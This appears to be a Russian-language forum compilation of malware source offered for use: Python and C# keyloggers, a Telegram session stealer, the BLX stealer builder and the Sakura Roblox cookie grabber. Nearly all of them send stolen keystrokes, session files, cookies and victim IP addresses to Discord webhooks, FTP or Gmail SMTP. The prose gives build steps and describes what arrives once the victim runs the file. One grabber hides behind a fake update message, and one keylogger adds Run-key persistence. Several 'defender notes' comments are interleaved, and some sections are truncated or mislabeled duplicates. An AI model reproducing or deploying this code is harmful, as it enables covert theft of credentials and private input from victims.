            byte_count = (value.bit_length() + 7) // 8
            word = value.to_bytes(byte_count, byteorder='big').decode()
            decoded_words.append(" " + word)
    return "".join(decoded_words)

def __makebuild(webh_url, max_len):
    if webh_url == "":
        return ui.notify(f"Please enter a webhook url!", timeout=30, progress=True, color="red", position="top-left")
   
    ui.notify(f"Build is starting!", timeout=30, progress=True, color="orange", position="top-left")
   
    with open("ezkey.pyw", "r") as f:
        _ezkey = f.read()
       
    _ezkey = _ezkey.replace("discord_webhook = \"xpierroz on top\"", f"discord_webhook = \"{webh_url}\"")
    _ezkey = _ezkey.replace(
        "self.__max_len_file = 10", "self.__max_len_file = {}"
        .format(max_len if max_len != "" else 10
                )
        )
   
    with open("ezkey.pyw", "w") as f:
        f.write(_ezkey)
       
    ui.notify(f"Build has finished!", timeout=30, progress=True, color="green", position="top-left")

def _home():
    ui.label("EZKey Builder").classes('text-center text-xl font-bold')
   
    with ui.column():
        webh_url = ui.input(label='WebHook URL', placeholder='EZKey my g').props('inline color=orange-3').classes('w-full')
        max_len = ui.input(label='MaxLines len (default 10)', placeholder='u should enter 10').props('inline color=orange-3').classes('w-full')
        ui.button('Build', on_click=lambda: __makebuild(webh_url.value, max_len.value)).props("icon=build color=orange-3").classes('w-full')
       
def _translate(text):
    random_number = random.randint(0, 100000)
    name = f"translated_{random_number}.txt"
    with open(name, "w") as f:
        f.write(text)
       
    return name
       
def translate(text):
    name = _translate(text)
    os.startfile(name)
   
def _decoder():
    with ui.dialog().props('full-width') as dialog:
        with ui.card():
            content = ui.markdown()

    def handle_upload(e: events.UploadEventArguments):
        text = e.content.read().decode('utf-8')
        _converted = convert_text(text)
        content.set_content(_converted)
        translate(_converted)
    with ui.column():
        ui.label("Open your .cache file").classes('text-xl font-bold')
        with ui.row():
            ui.upload(on_upload=handle_upload, multiple=False, auto_upload=True).props('accept=.cache color=orange-3').classes('max-w-full centered')

with ui.tabs().classes('w-full center') as tabs:
    ui.tab('Home', icon='home')
    ui.tab('Decoder', icon='lock_open')

with ui.tab_panels(tabs, value='Home').classes('bg-transparent').classes('w-full center'):
    with ui.tab_panel('Home'):
        _home()
    with ui.tab_panel('Decoder'):
        _decoder()
           
def start_nicegui(**kwargs):
    ui.run(
        title=__title__,
        **kwargs
    )

if __name__ in {"__main__", "__mp_main__"}:
    DEBUG = False

    if DEBUG:
        ui.run()
    else:
        FlaskUI(
            server=start_nicegui,
            server_kwargs={"dark": True, "reload": False, "show": False, "port": 3000},
            width=500,
            height=650,
        ).run()
   
ezkey.pyw

Python:
from pynput import keyboard
from pynput import mouse

from discord_webhook import AsyncDiscordWebhook, DiscordWebhook, DiscordEmbed
import requests
import asyncio

import os
 
__author__ = "xpierroz"

discord_webhook = "xpierroz on top"

__r = requests.get('https://api.ipify.org/').text
__c = os.getenv('COMPUTERNAME')


async def _send_data():
    """Upload the local ``MatPlot.cache`` file to the configured Discord webhook.

    The webhook URL is read from the module-level ``discord_webhook``. The
    message carries an embed whose description contains the module-level
    ``__c`` (the COMPUTERNAME environment variable) and ``__r`` (the response
    text fetched from api.ipify.org when the module is loaded).

    Defender notes: the network indicators are the request to api.ipify.org
    at start-up and an HTTPS upload with a file attachment to a Discord
    webhook URL from a process that is not a Discord client. On the host, the
    indicator is a file named ``MatPlot.cache`` in the process working
    directory. The attachment name and embed title below are fixed strings
    and can be matched in a sample.
    """
    webhook = AsyncDiscordWebhook(
            url=discord_webhook,
            rate_limit_retry=True,
        )
            

    embed = DiscordEmbed(title='EZKey Grabber', description=f'Data from {__c} | {__r}', color='544C53')
    # The whole file is read into memory and attached under a fixed file name.
    with open("MatPlot.cache", "rb") as f:
        webhook.add_file(file=f.read(), filename='fuck.cache')
    webhook.add_embed(embed)
    await webhook.execute(remove_embeds=True)
    # Drop the attachment from the webhook object once the request has been sent.
    webhook.remove_files()

class Logger():
    def __init__(self):
        self.__max_len_file = 10
        self.word = ""
        self.data = []
        #self.webhook = DiscordWebhook(
        #    url=discord_webhook,
        #    rate_limit_retry=True,
        #    content="New data"
        #)
            

    def send_data(self):
        asyncio.run(_send_data())
        return
        #embed = DiscordEmbed(title='EZKey Grabber', description=f'Data from {self.__c} | {self.__r}', color='544C53')
        #with open("MatPlot.cache", "rb") as f:
        #    self.webhook.add_file(file=f.read(), filename='fuck.cache')
        #self.webhook.add_embed(embed)
        #self.webhook.execute(remove_embeds=True)
        #self.webhook.remove_files()
        
    def erase_file(self):
        with open("MatPlot.cache", "w") as f:
            f.write("")
        
    def get_lenfile(self):
        with open("MatPlot.cache", "r") as f:
            return len(f.readlines())
        
    def convert_data(self):
        #Used to convert stuff like \x14 to CTRL4, you can see all the translations here
        # -> https://condor.depaul.edu/sjost/lsp121/documents/ascii-npr.htm
        # By the way don't forget that in most cases ^ is the CTRL key, but it can't still be used apart
        # and I have nothing to prevent that but I don't care just make a pr lol

        _data = []
        for elem in self.data:
            new_elem = ""
            for char in elem:
                if 0 <= ord(char) <= 31:
                    new_elem += " CTRL + " + chr(ord(char) + 64) + " "
                else:
                    new_elem += char
            _data.append(new_elem)

        
        int_dat = [] # Basic stuff to convert a str to int so if somebody opens this file he aint gonna understand
        for element in _data:
            encoded_bytes = element.encode()
            encoded_int = int.from_bytes(encoded_bytes, byteorder='big')
            int_dat.append(encoded_int)
            
        return int_dat       
        
    def write_data(self):
        _dat = self.convert_data()
        with open("MatPlot.cache", "a+") as f:
            for word in _dat:
                f.write(str(word)) # Might not need to convert to str but we neva know aight
                f.write(" ")
            f.write("\n")
        self.data = []
        
    def check_data(self):
        if len(self.data) > 10:
            self.write_data()
            if self.get_lenfile() > self.__max_len_file:
                self.send_data()
                self.erase_file()
            self.data = []
    
    def on_press(self, key):
        try:
            if key.char == " ":
                self.data.append(self.word)
                self.word = ""
            else:
                self.word += key.char
        except AttributeError:
            if key == keyboard.Key.backspace:
                self.word = self.word[:-1]
            if key == keyboard.Key.space or key == keyboard.Key.enter:
                self.data.append(self.word)
                self.word = ""
            elif key == keyboard.Key.ctrl_l:
                return
            elif not self.word == "":
                self.data.append(self.word)
        self.check_data()
            

    def on_mouse_press(self, *args):
        #print(*args)
        pass
    
logger = Logger()
listener = keyboard.Listener(
    on_press=logger.on_press)
listener.start()

listenerx = mouse.Listener(
    on_click=logger.on_mouse_press
)
listenerx.start()

while True:
    #print(logger.data)
    pass




Telegram Stealer v3.0​

Stealer Telegram Session c обходом 2FA с использованием Python, переделанного в exe.
Отправляет через FTP сервер. Подобный скрипт уже есть выше, понравился чем-то, но пайтон интереснее.

В конце скрипта впишите FTP данные, можете воспользоваться FileZilla https://filezilla-project.org/.
Как жертва откроет, у себя на компе замените данные в Telegram Portable на присланные в архиве, папка tdata.


Vectr_v3.0.py

Python:
import os
import os.path
import shutil
import glob
from datetime import datetime
from ftplib import FTP
from zipfile import ZipFile

now = datetime.now()
name_archive = str(now.strftime("%d_%m_%y_%I_%M"))

# Get current user home
pathusr = os.path.expanduser('~')
# Set tdata folder location
tdata_path = pathusr + '\\AppData\\Roaming\\Telegram Desktop\\tdata\\'
tdata_session_zip = pathusr + '\\AppData\\Roaming\\Telegram Desktop\\' + name_archive + ".zip"

# Creating folders
os.mkdir(tdata_path + '\\connection_hash')
os.mkdir(tdata_path + '\\map')

# Copy all session folders
folders = [folder for folder in os.listdir(tdata_path) if len(folder) >= 15 and os.path.isdir(os.path.join(tdata_path, folder))]
for folder in folders:
    shutil.copytree(os.path.join(tdata_path, folder), os.path.join(tdata_path, 'map', folder))

# Copying files (+usertag)
files16 = glob.iglob(os.path.join(tdata_path, "??????????*"))
usertag_file = os.path.join(tdata_path, "usertag")
files16 = [usertag_file] + list(files16)
for file in files16:
    if os.path.isfile(file):
        shutil.copy2(file, tdata_path + '\\connection_hash')

#Key_data
key_data = glob.iglob(os.path.join(tdata_path , "key_datas"))
for file in key_data:
    if os.path.isfile(file):
        shutil.copy2(file, tdata_path + '\\connection_hash')

#Archivation folders
with ZipFile(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\session.zip','w') as zipObj:
   # Iterate over all the files in directory
   for folderName, subfolders, filenames in os.walk(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\tdata\\map'):
       for filename in filenames:
           #create complete filepath of file in directory
           filePath = os.path.join(folderName, filename)
           # Add file to zip
           zipObj.write(filePath)

   for folderName, subfolders, filenames in os.walk(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\tdata\\connection_hash'):
       for filename in filenames:
           #create complete filepath of file in directory
           filePath = os.path.join(folderName, filename)
           # Add file to zip
           zipObj.write(filePath)

shutil.rmtree(tdata_path + '\\connection_hash')
shutil.rmtree(tdata_path + '\\map')

old_file = os.path.join(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\', 'session.zip')
new_file = os.path.join(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\' , name_archive + ".zip")
os.rename(old_file, new_file)

# Connect to the FTP server on the control port 21 and change into the upload directory.
# Defender notes: this is plain FTP, so the login and the transferred archive
# are visible to network monitoring. An outbound FTP session from a workstation
# that stores a zip named in the `DD_MM_YY_HH_MM.zip` pattern (see `name_archive`)
# is the network indicator for this script.
ftp = FTP()
# Debug level 2 makes ftplib print the control-connection dialogue to stdout.
ftp.set_debuglevel(2)
ftp.connect('Host_Name', 21)
ftp.login('User_Name', 'Password')
ftp.cwd('/htdocs/tgtest')

# List the remote directory, then upload the archive in 1024-byte blocks.
print(ftp.dir())
fp = open(tdata_session_zip, 'rb')
ftp.storbinary('STOR %s' % os.path.basename(name_archive + ".zip"), fp, 1024)
fp.close()

KeyLogger написан в C#: используется, чтобы перехватить события клавиатуры и записать клавиши в файл журнала
Как только файл журнала достигает определенного размера, программа архивирует файл журнала и отправляет его по электронной почте с помощью SMTP на примере Gmail, вы можете установить SMTP сервер по своим предпочтениям


code.cs


C#:
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;

namespace Keylogger
{
    class Program
    {
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;

        private static LowLevelKeyboardProc _proc = HookCallback;
        private static IntPtr _hookID = IntPtr.Zero;
        private static StringBuilder _sb = new StringBuilder();

        private static string _logFilePath = "log.txt";
        private static long _maxLogSize = 1024 * 1024; // 1 MB

        static void Main(string[] args)
        {
            _hookID = SetHook(_proc);

            try
            {
                Application.Run();
            }
            finally
            {
                UnhookWindowsHookEx(_hookID);
            }
        }

        private static IntPtr SetHook(LowLevelKeyboardProc proc)
        {
            using (var curProcess = System.Diagnostics.Process.GetCurrentProcess())
            using (var curModule = curProcess.MainModule)
            {
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
            }
        }

        private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
        {
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                int vkCode = Marshal.ReadInt32(lParam);
                _sb.Append((Keys)vkCode);

                if (_sb.Length > _maxLogSize)
                {
                    ArchiveLog();
                }
            }

            return CallNextHookEx(_hookID, nCode, wParam, lParam);
        }

        private static void ArchiveLog()
        {
            var archivePath = Path.Combine(Path.GetDirectoryName(_logFilePath), "log_" + DateTime.Now.ToString("yyyyMMddHHmmss") + ".txt");
            File.Move(_logFilePath, archivePath);
            SendLog(archivePath);
            _sb.Clear();
        }

        /// <summary>
        /// Sends the file at <paramref name="filePath"/> as an e-mail attachment
        /// through smtp.gmail.com on port 587 with SSL/TLS enabled.
        /// </summary>
        /// <param name="filePath">Path of the file that is attached to the message.</param>
        /// <remarks>
        /// Any exception thrown while building or sending the message is caught
        /// and discarded, so a failed send leaves no trace in the program itself.
        /// Defender notes: the account name, password and recipient are string
        /// literals compiled into the binary and can be recovered from a sample.
        /// The network indicator is an SMTP submission session to smtp.gmail.com:587
        /// from a process that is not a mail client, and the subject and body
        /// below are fixed strings.
        /// </remarks>
        private static void SendLog(string filePath)
        {
            try
            {
                // SMTP client for the Gmail submission endpoint, TLS enabled, fixed credentials.
                var smtpClient = new System.Net.Mail.SmtpClient("smtp.gmail.com", 587);
                smtpClient.EnableSsl = true;
                smtpClient.Credentials = new System.Net.NetworkCredential("youremail@gmail.com", "yourpassword");

                // Fixed sender, recipient, subject and body; the file is the only variable part.
                var mailMessage = new System.Net.Mail.MailMessage();
                mailMessage.From = new System.Net.Mail.MailAddress("youremail@gmail.com");
                mailMessage.To.Add("recipientemail@gmail.com");
                mailMessage.Subject = "Keylogger Log";
                mailMessage.Body = "Please find attached the log file.";
                mailMessage.Attachments.Add(new System.Net.Mail.Attachment(filePath));

                smtpClient.Send(mailMessage);
            }
            catch (Exception ex)
            {
                // Intentionally empty in the original: the exception is swallowed.
            }
        }

[DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]

Polymorphic Keylogger

Python KeyLogger включает полиморфные стратегии, чтобы избежать обнаружения систем безопасности, как и у всех скриптов захватывает клавиши, но шифрует их с использованием динамически сгенерированных ключей, а также обфусцирует свой собственный код, чтобы избежать детектов.

Захватывает клавиши в целевой системе.
Реализует полиморфные методы, чтобы динамически изменять поведение и структуру.
Шифрует захваченные клавишные клавиши, используя случайно сгенерированный ключ.
Обфусцирует код KeyLogger, чтобы уклониться от обнаружения.
Хранит зашифрованные клавишные клавиши для последующего анализа.


Polymorphic_Keylogger_Basic.py


Python:
import random

# Generate a random key for encryption
def generate_key():
    key = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(10))
    return key

# Encrypt the captured keystrokes using the generated key
def encrypt(keystrokes, key):
    encrypted_keystrokes = ""
    for char in keystrokes:
        encrypted_keystrokes += chr(ord(char) ^ ord(key))
    return encrypted_keystrokes

# Obfuscate the keylogger code
def obfuscate_code():
    # Code obfuscation techniques can be applied here
    # This can include renaming variables and functions, adding junk code, using encoding/decoding techniques, etc.
    pass

# Main keylogger functionality
def keylogger():
    keystrokes = ""
    key = generate_key()

    while True:
        # Capture keystrokes
        keystroke = capture_keystroke()

        # Perform polymorphic operations
        obfuscate_code()
        key = generate_key()

        # Encrypt and store keystrokes
        encrypted_keystrokes = encrypt(keystroke, key)
        store_keystrokes(encrypted_keystrokes)

# Entry point
if __name__ == "__main__":
    keylogger()

Multi_Platform_keylogger.py

Python:
import random
import platform
import os

# Generate a random key for encryption
def generate_key():
    key = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(10))
    return key

# Encrypt the captured keystrokes using the generated key
def encrypt(keystrokes, key):
    encrypted_keystrokes = ""
    for char in keystrokes:
        encrypted_keystrokes += chr(ord(char) ^ ord(key))
    return encrypted_keystrokes

# Obfuscate the keylogger code
def obfuscate_code():
    # Code obfuscation techniques can be applied here
    # This can include renaming variables and functions, adding junk code, using encoding/decoding techniques, etc.
    pass

# Capture keystrokes based on the platform
def capture_keystroke():
    system = platform.system()
    if system == "Windows":
        import msvcrt
        return msvcrt.getch().decode()
    elif system == "Linux" or system == "Darwin":
        import termios
        import sys
        import tty
        fd = sys.stdin.fileno()
        old_settings = termios.tcgetattr(fd)
        try:
            tty.setraw(sys.stdin.fileno())
            ch = sys.stdin.read(1)
        finally:
            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
        return ch
    else:
        raise Exception("Unsupported platform")

# Store keystrokes based on the platform
def store_keystrokes(keystrokes):
    system = platform.system()
    if system == "Windows":
        file_path = "keystrokes.txt"
        with open(file_path, "a") as file:
            file.write(keystrokes)
            file.write("\n")
    elif system == "Linux" or system == "Darwin":
        file_path = os.path.expanduser("~/keystrokes.txt")
        with open(file_path, "a") as file:
            file.write(keystrokes)
            file.write("\n")
    else:
        raise Exception("Unsupported platform")

# Main keylogger functionality
def keylogger():
    keystrokes = ""
    key = generate_key()

    while True:
        try:
            # Capture keystrokes
            keystroke = capture_keystroke()

            # Perform polymorphic operations
            obfuscate_code()
            key = generate_key()

            # Encrypt and store keystrokes
            encrypted_keystrokes = encrypt(keystroke, key)
            store_keystrokes(encrypted_keystrokes)

        except Exception as e:
            # Handle any exceptions gracefully
            print(f"Error: {str(e)}")
            continue

# Entry point
if __name__ == "__main__":
    keylogger()

BLX Stealer Python​

  • Все cookie и пароли браузеров
  • Специальные файлы
  • Учётные записи Steam, Riot и Telegram
  • Metamask, Phantom, Binance, Coinbase, Exodus, Atomic и Trust wallet
  • Token Grabber из Canary Discord, Better Discord, Discord в браузерах и Discord приложения
  • Грабер HQ Friends, Email, Phone Number и Token
  • Имеет инъекцию
  • Отправляет через Webhook Discord
sudo apt install python3 && python3-pip
pip3 install requests pycryptodome pystyle colorama auto_py_to_exe pyinstaller wmi
python3 builder.py


builder.py​


Python:
from pystyle import *
import os
import subprocess
import requests
from colorama import *
import time

os.system('clear' if os.name == 'posix' else 'cls')

intro = """
 ▄▄▄▄     ██▓   ▒██   ██▒      ██████ ▄▄▄█████▓ ▓█████ ▄▄▄       ██▓    ▓█████ ██▀███
▓█████▄  ▓██▒   ▒▒ █ █ ▒░    ▒██    ▒ ▓  ██▒ ▓▒ ▓█   ▀▒████▄    ▓██▒    ▓█   ▀▓██ ▒ ██▒
▒██▒ ▄██ ▒██░   ░░  █   ░    ░ ▓██▄   ▒ ▓██░ ▒░ ▒███  ▒██  ▀█▄  ▒██░    ▒███  ▓██ ░▄█ ▒
▒██░█▀   ▒██░    ░ █ █ ▒       ▒   ██▒░ ▓██▓ ░  ▒▓█  ▄░██▄▄▄▄██ ▒██░    ▒▓█  ▄▒██▀▀█▄
░▓█  ▀█▓▒░██████▒██▒ ▒██▒    ▒██████▒▒  ▒██▒ ░ ▒░▒████▒▓█   ▓██▒░██████▒░▒████░██▓ ▒██▒
░▒▓███▀▒░░ ▒░▓  ▒▒ ░ ░▓ ░    ▒ ▒▓▒ ▒ ░  ▒ ░░   ░░░ ▒░ ░▒▒   ▓▒█░░ ▒░▓  ░░░ ▒░ ░ ▒▓ ░▒▓░
▒░▒   ░ ░░ ░ ▒  ░░   ░▒ ░    ░ ░▒  ░ ░    ░    ░ ░ ░  ░ ░   ▒▒ ░░ ░ ▒  ░ ░ ░    ░▒ ░ ▒
 ░    ░    ░ ░   ░    ░      ░  ░  ░    ░          ░    ░   ▒     ░ ░      ░    ░░   ░
 ░      ░    ░   ░    ░            ░           ░   ░        ░  ░    ░  ░   ░     ░   
                       Enter                                       
"""

Anime.Fade(Center.Center(intro), Colors.black_to_red, Colorate.Vertical, interval=0.035, enter=True)


print(f"""{Fore.LIGHTRED_EX}
 ▄▄▄▄     ██▓   ▒██   ██▒      ██████ ▄▄▄█████▓ ▓█████ ▄▄▄       ██▓    ▓█████ ██▀███
▓█████▄  ▓██▒   ▒▒ █ █ ▒░    ▒██    ▒ ▓  ██▒ ▓▒ ▓█   ▀▒████▄    ▓██▒    ▓█   ▀▓██ ▒ ██▒
▒██▒ ▄██ ▒██░   ░░  █   ░    ░ ▓██▄   ▒ ▓██░ ▒░ ▒███  ▒██  ▀█▄  ▒██░    ▒███  ▓██ ░▄█ ▒
▒██░█▀   ▒██░    ░ █ █ ▒       ▒   ██▒░ ▓██▓ ░  ▒▓█  ▄░██▄▄▄▄██ ▒██░    ▒▓█  ▄▒██▀▀█▄
░▓█  ▀█▓▒░██████▒██▒ ▒██▒    ▒██████▒▒  ▒██▒ ░ ▒░▒████▒▓█   ▓██▒░██████▒░▒████░██▓ ▒██▒
░▒▓███▀▒░░ ▒░▓  ▒▒ ░ ░▓ ░    ▒ ▒▓▒ ▒ ░  ▒ ░░   ░░░ ▒░ ░▒▒   ▓▒█░░ ▒░▓  ░░░ ▒░ ░ ▒▓ ░▒▓░
▒░▒   ░ ░░ ░ ▒  ░░   ░▒ ░    ░ ░▒  ░ ░    ░    ░ ░ ░  ░ ░   ▒▒ ░░ ░ ▒  ░ ░ ░    ░▒ ░ ▒
 ░    ░    ░ ░   ░    ░      ░  ░  ░    ░          ░    ░   ▒     ░ ░      ░    ░░   ░
 ░      ░    ░   ░    ░            ░           ░   ░        ░  ░    ░  ░   ░     ░   

""")

time.sleep(2)


while True:
 
    Write.Print("\nWhich option do you want to choose: ", Colors.red)
    Write.Print("\n1. Build .exe", Colors.red)
    Write.Print("\n2. Build FUD .exe", Colors.red)
    Write.Print("\n3. Close Builder", Colors.red)
    Write.Print("\nMake your selection: ", Colors.red, end="")
    choice = input()

    if choice == "1":
        os.system("cls || clear")
        webhook = input(Fore.RED + "\nEnter Your Webhook: " + Style.RESET_ALL)

        filename = "blxstealer.py"
        filepath = os.path.join(os.getcwd(), filename)
        with open(filepath, "r", encoding="utf-8") as f:
            content = f.read()
        new_content = content.replace('"YOUR WEBHOOK HERE"', f'"{webhook}"')
        with open(filepath, "w", encoding="utf-8") as f:
            f.write(new_content)
        Write.Print(f"\n{filename} file updated.", Colors.red)

        obfuscate = False

        while True:
            answer = input(Fore.CYAN + "\nDo you want to make exe file? (Y/N) " + Style.RESET_ALL)
            if answer.upper() == "Y":
                if not obfuscate:
                    cmd = f"pyinstaller --onefile --windowed {filename}"
                else:
                    cmd = f"pyinstaller --onefile --windowed {filename} --name {filename.split('.')[0]}"
                subprocess.call(cmd, shell=True)
                Write.Print(f"\n{filename} The file has been converted to exe.", Colors.red)
                break
            elif answer.upper() == "N":
                break
            else:
                Write.Print("\nYou have entered invalid. Please try again.", Colors.red)

    elif choice == "2":
        Write.Print("\nВоспользуйтесь обфускаторами и криптерами", Colors.red)

    elif choice == "3":
        Write.Print("\nExiting the program...", Colors.red)
        break

    else:
        Write.Print("\nYou have entered invalid. Please try again.", Colors.red)
 

Sakura Grabber - Python Cookie Стилер через Webhook​

Крадёт куки ROBLOX. Взаимодействует с Firefox, Safari, Chromium, Microsoft Edge, Opera (GX), Opera, Brave, Chrome.
Куки можно заменить на спецефические, нужные вам. Webhook от Discord вставите в двух местах.

sudo apt install python3 && python3-pip
pip3 install requests robloxpy browser_cookie3 dhooks discordwebhook getch

PY переделаете в EXE. Как только жертва запустит - вам придут куки из браузеров в диско.

Sakura.py

Python:
import os
from dhooks import Webhook, Embed
import socket
import requests
from tkinter import messagebox
from base64 import b64decode
from msvcrt import getch
from tkinter import messagebox

os.system("title Sakura Grabber")

webhook = "Enter Webhook Here - Cookie Logger"
webhook1 = Webhook('Enter Webhook Here - IP Logger')

try:
    import robloxpy
    import requests
    import browser_cookie3

except:
    input("One Of The Packages Are Not Installed, Run 'Requirements.Bat' To Remove This Error!")
    exit()

import time
time.sleep(1.5)

Sakura_message = "Checking For Updates..."
print(Sakura_message)

import time
time.sleep(8.5)

Sakura_message = "Error, Not On Latest Version!"
print(Sakura_message)

import time
time.sleep(2.5)

Sakura_message = "Installing..."
print(Sakura_message)

def cookiecheckerandsend(cookie, platform):

    if not robloxpy.Utils.CheckCookie(cookie) == "This Is A Valid Cookie":
        return requests.post(url=webhook, data={"content":f"\n|| ```{cookie}``` ||"})

    info = requests.get("https://www.roblox.com/mobileapi/userinfo",cookies={".ROBLOSECURITY":cookie}).json()

    requests.post(url=webhook, json={
        'username': "Sakura",
        'avatar_url': "https://cdn.discordapp.com/avatars/994230412383633480/1057a089f5141d9aac5848210c55212c.png?size=256",
        'embeds': [{
                "title": f"Sakura Grabber",
                "fields": [
                    {"name": ".ROBLOSECURITY", "value": f"```fix\n{cookie}```", "inline": True},
                ],
                "footer": {
                    ""
                }
            }
        ]
    }
)

hostname = socket.gethostname()
ip = requests.get('https://api.ipify.org/').text
r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')
geo = r.json()
embed = Embed()
fields = [
    {'name': 'IP Address', 'value': geo['query']},
]
for field in fields:
    if field['value']:
        embed.add_field(name=field['name'], value=field['value'], inline=True)
webhook1.send(embed=embed)

def Sakura():

    try:
        cookies = browser_cookie3.firefox(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Firefox')
    except:
        pass

    try:
        cookies = browser_cookie3.safari(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Safari')
    except:
        pass

    try:
        cookies = browser_cookie3.chromium(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Chromium')
    except:
        pass

    try:
        cookies = browser_cookie3.edge(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Microsoft Edge')
    except:
        pass

    try:
        cookies = browser_cookie3.opera_gx(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Opera GX')
    except:
        pass

    try:
        cookies = browser_cookie3.opera(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Opera')
    except:
        pass

    try:
        cookies = browser_cookie3.brave(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Brave')
    except:
        pass

    try:
        cookies = browser_cookie3.chrome(domain_name='roblox.com')
        for cookie in cookies:
            if cookie.name == '.ROBLOSECURITY':
                cookiecheckerandsend(cookie.value, platform='Chrome')
    except:
        pass

cookies = Sakura()

messagebox.showerror("Error", "Unable to install latest version.")

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe
Время отправки каждый час SEND_REPORT_EVERY = 3600

sudo apt install python3 && python3-pip
pip3 install keyboard discord_webhook pyinstaller
pyinstaller keylogger.py --onefile --noconsole


keylogger.py​



self.start_dt = datetime.now()
keyboard.on_release(callback=self.callback)
self.report()
keyboard.wait()

if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="webhook")
keylogger.start()

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe

sudo apt install python3 && python3-pip
pip3 install pynput discord_webhook pyinstaller
pyinstaller -F -w main.py

Флаги -F и -w означают, что программа будет упакована в один файл и работает в фоновом режиме (без окон).

main.py​


Python:
import pynput
from pynput.keyboard import Key, Listener
from discord_webhook import DiscordWebhook
import winreg
import sys

# Module-level configuration and logon persistence. Everything in this run
# executes when the script starts, before any key is captured.
webhook_url = '#'     # Destination of the captured text; '#' is the unconfigured placeholder
registry_name = 'Discord Webhook Keylogger'     # Value name written under the Run key below
keys_buffer = ''     # Captured keys that have not been sent yet

# Analyst note: persistence here is a Run-key value in the current user's hive
# (ATT&CK T1547.001). The value name is the literal above and the value data is
# sys.argv[0], i.e. the path the program was started with. Auditing writes to
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run, or reviewing autostart
# entries, surfaces it; deleting the value removes the autostart.
winreg.CreateKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run")     # Create the Run key if it is missing
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)     # Open the key with write access
winreg.SetValueEx(registry_key, registry_name, 0, winreg.REG_SZ, sys.argv[0])     # Write the autostart value (REG_SZ)
winreg.CloseKey(registry_key)     # Release the handle

def send_message(message):
    DiscordWebhook(url=webhook_url, content=message).execute()     # Send message using Webhook

def on_press(key):     # Listener callback, invoked once per key press
    # Turns the key into text and appends it to the module-level buffer. The
    # buffer is sent and cleared when ENTER is pressed or when adding the key
    # would bring it to 1975 characters or more.
    # Analyst note (ATT&CK T1056.001): outbound webhook requests from this
    # process therefore line up with ENTER presses and with long typing runs,
    # which is a usable correlation in proxy or endpoint network telemetry.
    global keys_buffer
    if str(key)[:4] == 'Key.':     # Special keys stringify with a 'Key.' prefix
        key = ' `[' + str(key) + ']`'
    else:
        key = str(key)[1]     # Presumably the character between the quotes of the key's string form
    if len(keys_buffer) + len(key) >= 1975 or key == ' `[Key.enter]`':     # Flush near Discord's 2000-character message limit, or on ENTER
        send_message(keys_buffer + key)     # One webhook request per flush
        keys_buffer = ''     # Start a fresh buffer
    else:
        keys_buffer += key     # Keep accumulating until the next flush

with Listener(on_press=on_press) as listener:
    listener.join()     # Start the listener

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe
Время отправки каждый час SEND_REPORT_EVERY = 3600

sudo apt install python3 && python3-pip
pip3 install keyboard discord_webhook pyinstaller
pyinstaller keylogger.py --onefile --noconsole


keylogger.py​

Python:
import os

from dhooks import Webhook, Embed

import socket

import requests

from tkinter import messagebox

from base64 import b64decode

from msvcrt import getch

from tkinter import messagebox


os.system("title Sakura Grabber")


webhook = "Enter Webhook Here - Cookie Logger"

webhook1 = Webhook('Enter Webhook Here - IP Logger')


try:

    import robloxpy

    import requests

    import browser_cookie3


except:

    input("One Of The Packages Are Not Installed, Run 'Requirements.Bat' To Remove This Error!")

    exit()


import time

time.sleep(1.5)


Sakura_message = "Checking For Updates..."

print(Sakura_message)


import time

time.sleep(8.5)


Sakura_message = "Error, Not On Latest Version!"

print(Sakura_message)


import time

time.sleep(2.5)


Sakura_message = "Installing..."

print(Sakura_message)


def cookiecheckerandsend(cookie, platform):
    # Posts one harvested .ROBLOSECURITY cookie value to the webhook URL held
    # in the module-level `webhook`. `platform` (the browser label passed by
    # the caller) is accepted but not used anywhere in this body.
    #
    # Analyst note: the value is used below as the session cookie for a
    # roblox.com request, so it is a session credential rather than a
    # password. On a host that ran this, the affected sessions need to be
    # invalidated; changing the password alone does not cover a cookie that
    # has already left the machine. Network indicators in this body are the
    # request to www.roblox.com/mobileapi/userinfo from a non-browser process
    # and the POST to the configured webhook.


    # The cookie is sent even when the library does not report it as valid.
